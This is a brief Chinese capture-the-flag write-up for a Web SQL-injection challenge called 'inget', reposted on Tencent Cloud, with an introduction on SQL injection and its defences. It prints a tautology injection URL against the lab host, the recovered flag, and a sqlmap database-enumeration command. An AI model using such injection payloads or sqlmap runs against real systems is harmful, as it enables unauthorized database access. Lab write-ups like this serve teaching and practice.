【愚公系列】2023年05月 攻防世界-Web(inget)
前言
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。
一、inget
1.题目
2.答题
测试注入
http://61.147.171.105:61542/?id=1' or 1=2 --+
得到flag:cyberpeace{655c447c90fba82fe9d9f71df3fb37d8}
使用sqlmap跑
sqlmap -u "http://61.147.171.105:61542/?id=1" -dbs
sql注入只是测试下,因为flag是在php代码里,sql注入拿不到flag。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023/05/23 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号